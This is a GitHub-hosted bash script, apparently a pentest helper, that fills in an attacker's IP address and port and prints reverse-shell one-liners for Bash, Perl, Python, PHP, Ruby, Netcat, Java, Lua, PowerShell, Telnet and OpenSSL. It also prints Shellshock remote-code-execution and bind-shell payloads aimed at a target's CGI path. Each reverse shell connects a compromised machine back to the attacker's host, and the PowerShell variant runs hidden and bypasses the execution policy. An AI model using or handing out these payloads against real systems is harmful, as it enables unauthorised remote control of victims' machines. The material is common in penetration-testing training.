forked from DevoOverkill9/shell_lover
-
Notifications
You must be signed in to change notification settings - Fork 1
/
shell_lover.sh
executable file
·183 lines (132 loc) · 7.21 KB
/
shell_lover.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
#!/bin/bash
# Reset
Color_Off='\033[0m' # Text Reset
# Regular Colors
Black='\033[0;30m' # Black
Red='\033[0;31m' # Red
Green='\033[0;32m' # Green
Yellow='\033[0;33m' # Yellow
Blue='\033[0;34m' # Blue
Purple='\033[0;35m' # Purple
Cyan='\033[0;36m' # Cyan
White='\033[0;37m' # White
# High Intensity
IBlack='\033[0;90m' # Black
IRed='\033[0;91m' # Red
IGreen='\033[0;92m' # Green
IYellow='\033[0;93m' # Yellow
IBlue='\033[0;94m' # Blue
IPurple='\033[0;95m' # Purple
ICyan='\033[0;96m' # Cyan
IWhite='\033[0;97m' # White
# Marks
pos="[${Green}+${Color_Off}]"
neg="[${Red}-${Color_Off}]"
function ascii_art(){
echo -e """
${Red}╔═╗${Green}┬ ┬┌─┐┬ ┬ ${Red}╦ ┌─┐┬ ┬┌─┐┬─┐
${Red}╚═╗${Green}├─┤├┤ │ │ ${Red}║ │ │└┐┌┘├┤ ├┬┘
${Red}╚═╝${Green}┴ ┴└─┘┴─┘┴─┘ ${Red}╩═╝└─┘ └┘ └─┘┴└─
${IWhite}Original Author : Captain_M!dnight
[${Red}NOTICE${Color_Off}]Texts in red are changable
${Color_Off}"""
}
function prompt(){
printf "${IGreen}Shells${IGreen}:${Color_Off} "
}
function reverse_shell_list(){
echo -e """
[${Blue}1${Color_Off}]Bash [${IRed}2${Color_Off}]Ruby
[${Green}3${Color_Off}]Perl [${Cyan}4${Color_Off}]Netcat
[${Yellow}5${Color_Off}]Python [${IYellow}6${Color_Off}]Java
[${Purple}7${Color_Off}]PHP [${IBlue}8${Color_Off}]Shellshock
[${Cyan}9${Color_Off}]Lua [${Blue}10${Color_Off}]Powershell
[${Green}11${Color_Off}]Telnet [${Yellow}12${Color_Off}]Open_ssl
"""
echo -e "${Green}Hint${Color_Off} Find out what programs are installed with:"
echo -e 'for item in $(echo "nmap nc perl python ruby gcc wget sudo curl"); do which $item; done\n'
while true;do
prompt
read shell_type
case $shell_type in
1) bash_shell;;
2) ruby_shell;;
3) perl_shell;;
4) netcat_shell;;
5) python_shell;;
6) java_shell;;
7) php_shell;;
8) shellshock;;
9) lua_shell;;
10) powershell;;
11) telnet;;
12) open_ssl;;
"exit"|"q"|"quit") exit 0;;
*)echo -e "[-]Enter the shell number";reverse_shell_list;;
esac
done
}
## make changable things with diffrent color ##
function bash_shell(){
echo -e "${pos}${Yellow}Bash shell:${Color_Off}"
echo -e "${pos}${Yellow}Bash shell [1]:${Color_Off}bash -i >& /dev/tcp/${Red}$ipaddr/$port${Color_Off} 0>&1"
echo -e "${pos}${Yellow}Bash shell [2]:${Color_Off}exec 5<>/dev/tcp/${Red}$ipaddr/$port${Color_Off};cat <&5 | while read line; do $line 2>&5 >&5; done"
echo -e "${pos}${Yellow}Bash shell [3]:${Color_Off}exec /bin/sh 0</dev/tcp/${Red}$ipaddr/$port${Color_Off} 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196"
}
function perl_shell(){
echo -e "${pos}${Yellow}Perl shell:${Color_Off} perl -e 'use Socket;${Red}\$i=\"$ipaddr\"${Color_Off};${Red}\$p=$port${Color_Off};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
}
function python_shell(){
echo -e "${pos}${Yellow}Python shell:${Color_Off} python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((${Red}\"$ipaddr\",$port${Color_Off}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
}
function php_shell(){
echo -e "${pos}${Yellow}PHP shell:${Color_Off} php -r '\$sock=fsockopen(\"${Red}$ipaddr\",$port${Color_Off});exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
}
function ruby_shell(){
echo -e "${pos}${Yellow}Ruby shell:${Color_Off} ruby -rsocket -e'f=TCPSocket.open(${Red}\"$ipaddr\",$port${Color_Off}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"
}
function netcat_shell(){
echo -e "${pos}${Yellow}Netcat shell [1]:${Color_Off} nc -e /bin/sh ${Red}$ipaddr $port${Color_Off}\n"
echo -e "${pos}${Yellow}Netcat shell [2]:${Color_Off} rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ${Red}$ipaddr $port${Color_Off} >/tmp/f\n"
echo -e "${pos}${Yellow}Netcat shell [3]:${Color_Off} rm /tmp/l;mknod /tmp/l p;/bin/sh 0</tmp/l | nc ${Red}$ipaddr $port${Color_Off} 1>/tmp/l"
}
function java_shell(){
echo -e """${pos}${Yellow}Java shell:${Color_Off}
r = Runtime.getRuntime()
p = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/${Red}$ipaddr${Color_Off}/${Red}$port${Color_Off};cat <&5 | while read line; do \$line 2>&5 >&5; done\"] as String[])
p.waitFor()
"""
}
function shellshock(){
echo -e "${pos}${Yellow}Shellshock [RCE]:${Color_Off} wget -U \"() { test;};echo \"Content-type: text/plain\"; echo; echo; ${Red}YOUR_COMMAND${Color_Off}\" http://${Red}TARGET_IP${Color_Off}/cgi-bin/status\n"
echo -e "${pos}${Yellow}Shellshock [bind shell]:${Color_Off}"
echo "echo -e \"HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () { :;}; /usr/bin/nc -l -p 4444 -e /bin/sh\\r\\nHost: <TARGET_IP>\\r\\nConnection: close\\r\\n\\r\\n\" | nc <TARGET_IP> 80"
}
function lua_shell(){
echo -e "${pos}${Yellow}Lua shell:${Color_Off} lua5.1 -e 'local host,port = \"${Red}$ipaddr${Color_Off}\",${Red}$port${Color_Off} local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host,port); while true do local cmd,status,partial = tcp:receive() local f = io.popen(cmd,'r') local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'"
}
function powershell(){
echo -e "${pos}${Yellow}Powershell:${Color_Off} powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"${Red}$ipaddr${Color_Off}\",${Red}$port${Color_Off});\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + \"PS \" + (pwd).Path + \"> \";\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()"
}
function telnet(){
echo -e "${pos}${Yellow}Telnet Reverse Shell:${Color_Off} telnet ${Red}$ipaddr $port${Color_Off} | /bin/bash | telnet ${Red}$ipaddr 9999${Color_Off}"
echo -e "[${Red}*${Color_Off}]Set two listeners:
[${Red}Input${Color_Off}] nc -lnvvp ${Red}$port${Color_Off}
[${Green}Output${Color_Off}] nc -lnvvp ${Red}9999${Color_Off}"
}
function open_ssl(){
echo -e "${pos}${Yellow}Open_ssl Reverse Shell:"
echo -e "${Color_Off}${Green}On your machine: ${Color_Off}openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes"
echo -e "${Green}On your machine: ${Color_Off}openssl s_server -quiet -key key.pem -cert cert.pem -port ${Red}$port${Color_Off}"
echo -e "${Green}Reverse Shell on the compromised machine:${Color_Off}mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ${Red}$ipaddr${Color_Off}:${Red}$port${Color_Off} > /tmp/s; rm /tmp/s"
}
ipaddr=$1
port=$2
if [[ -z $1 ]] && [[ -z $2 ]];then
ascii_art
echo "[*]Usage: $0 <ipaddress> <port>"
exit 1
else
ascii_art
reverse_shell_list
fi